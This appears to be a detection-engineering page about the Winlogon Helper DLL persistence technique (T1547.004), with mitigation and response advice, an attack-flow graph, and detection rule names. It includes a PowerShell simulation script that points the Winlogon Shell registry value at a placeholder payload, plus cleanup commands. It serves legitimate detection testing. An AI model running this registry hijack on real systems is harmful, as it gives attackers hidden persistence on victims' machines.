Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article explains the Winlogon Helper DLL persistence method tracked as T1547.004 and shows how adversaries tamper with Winlogon registry keys to load malicious code during user logon. It references real-world examples tied to the ToyBraker campaign, KamiKakaBot malware, and a sample known as Mandela.exe. The emphasis is on registry changes that trigger automatic execution of malicious DLLs or executables when a system starts or a user signs in.
Investigation
Researchers documented attackers creating unauthorized user accounts and altering Winlogon registry values such as LegalNoticeText, DefaultUserName, AutoLogonCount, and Shell to preserve access. Malware samples and intrusion cases also showed use of command-line tools like net user and reg add to inject malicious settings and launch PowerShell payloads during the login process.
Mitigation
Defenders should closely monitor and restrict modifications to Winlogon registry keys, apply least-privilege controls to account creation, and use application control to block untrusted or unsigned DLLs. Regular reviews of scheduled tasks, services, and startup locations can further help identify unauthorized persistence changes.
Response
When suspicious Winlogon registry activity is discovered, isolate the affected endpoint, capture volatile evidence, and restore the modified registry values to a known-good state. A forensic investigation should then look for any additional persistence mechanisms and scan the host for related malware components.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef persistence fill:#c2f0c2 classDef technique fill:#ffd699 classDef malware fill:#f4a6a6 %% Node definitions action_create_account["<b>Action</b> – Create Local Account<br/><b>Technique</b>: T1136.001 Create Account: Local Account<br/><b>Description</b>: Adds a new local user using net user command."] class action_create_account action tool_net_user["<b>Tool</b> – net user command<br/><b>Purpose</b>: Create or modify local Windows accounts."] class tool_net_user tool action_modify_registry["<b>Action</b> – Modify Winlogon Registry<br/><b>Technique</b>: T1112 Modify Registry<br/><b>Description</b>: Alters Winlogon keys (Notify, Userinit, Shell, DefaultUserName, AutoLogonCount) via reg add."] class action_modify_registry action tool_reg_add["<b>Tool</b> – reg add command<br/><b>Purpose</b>: Add or change Windows registry values."] class tool_reg_add tool persistence_winlogon_helper["<b>Persistence</b> – Winlogon Helper DLL<br/><b>Technique</b>: T1547.004 Winlogon Helper DLL<br/><b>Description</b>: Loads malicious DLL or executable during user logon, providing elevated execution."] class persistence_winlogon_helper persistence technique_T1547_004["<b>Technique</b> – T1547.004<br/><b>Name</b>: Winlogon Helper DLL<br/><b>Description</b>: Registers a DLL to be loaded by Winlogon, granting persistence and privilege escalation."] class technique_T1547_004 technique malware_kamkaka["<b>Malware</b> – KamiKakaBot<br/><b>Uses</b>: Winlogon Helper DLL persistence."] class malware_kamkaka malware malware_mandela["<b>Malware</b> – Mandela.exe<br/><b>Uses</b>: Winlogon Helper DLL persistence."] class malware_mandela malware %% Connections showing flow action_create_account –>|uses| tool_net_user action_modify_registry –>|uses| tool_reg_add action_create_account –>|enables| persistence_winlogon_helper action_modify_registry –>|enables| persistence_winlogon_helper persistence_winlogon_helper –>|implements| technique_T1547_004 technique_T1547_004 –>|observed_in| malware_kamkaka technique_T1547_004 –>|observed_in| malware_mandela "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Winlogon/AppInit Hives] (via registry_event)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
IOCs (Emails) to detect: T1547.004 Winlogon Helper in MITRE ATT&CK Explained
View
IOCs (HashSha256) to detect: T1547.004 Winlogon Helper in MITRE ATT&CK Explained
View
Detection of Malicious Modifications in Winlogon Registry Keys [Windows Registry Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (T1547.004) designed to trigger the detection rule. The commands and narrative directly produce the telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker who has obtained local admin rights wants persistence across reboots. They choose the classic Winlogon “Shell” hijack because it runs before the user desktop loads and evades many endpoint AV products. The steps are:- Create a malicious payload (e.g.,
C:Tempevil.exe). - Add a new value to
HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogonShellpointing to the payload. - Verify the change took effect, then log off/on to achieve execution.
- Create a malicious payload (e.g.,
-
Regression Test Script:
#------------------------------------------------- # Regression Test – Winlogon Shell Hijack (T1547.004) #------------------------------------------------- param( [string]$PayloadPath = "C:Tempevil.exe", [string]$BackupPath = "$env:Tempwinlogon_shell_backup.txt" ) # 1. Deploy a dummy payload (a simple calc.exe copy for demo) if (-not (Test-Path $PayloadPath)) { Copy-Item "$env:SystemRootSystem32calc.exe" $PayloadPath -Force } # 2. Backup current Shell value (if any) $regPath = "HKLM:SoftwareMicrosoftWindows NTCurrentVersionWinlogon" $currentShell = (Get-ItemProperty -Path $regPath -Name Shell -ErrorAction SilentlyContinue).Shell Set-Content -Path $BackupPath -Value $currentShell -Encoding UTF8 # 3. Set malicious Shell value Set-ItemProperty -Path $regPath -Name Shell -Value $PayloadPath -Force Write-Host "[+] Malicious Winlogon Shell set to $PayloadPath" Write-Host "[+] Original value saved to $BackupPath" -
Cleanup Commands:
#--------------------------------- # Cleanup – Restore Winlogon Shell #--------------------------------- $regPath = "HKLM:SoftwareMicrosoftWindows NTCurrentVersionWinlogon" $backupFile = "$env:Tempwinlogon_shell_backup.txt" if (Test-Path $backupFile) { $original = Get-Content -Path $backupFile -Raw if ([string]::IsNullOrWhiteSpace($original)) { # Original value was empty – remove the property Remove-ItemProperty -Path $regPath -Name Shell -ErrorAction SilentlyContinue } else { Set-ItemProperty -Path $regPath -Name Shell -Value $original -Force } Remove-Item $backupFile -Force Write-Host "[+] Winlogon Shell restored to original state." } else { Write-Warning "Backup file not found – manual inspection required." }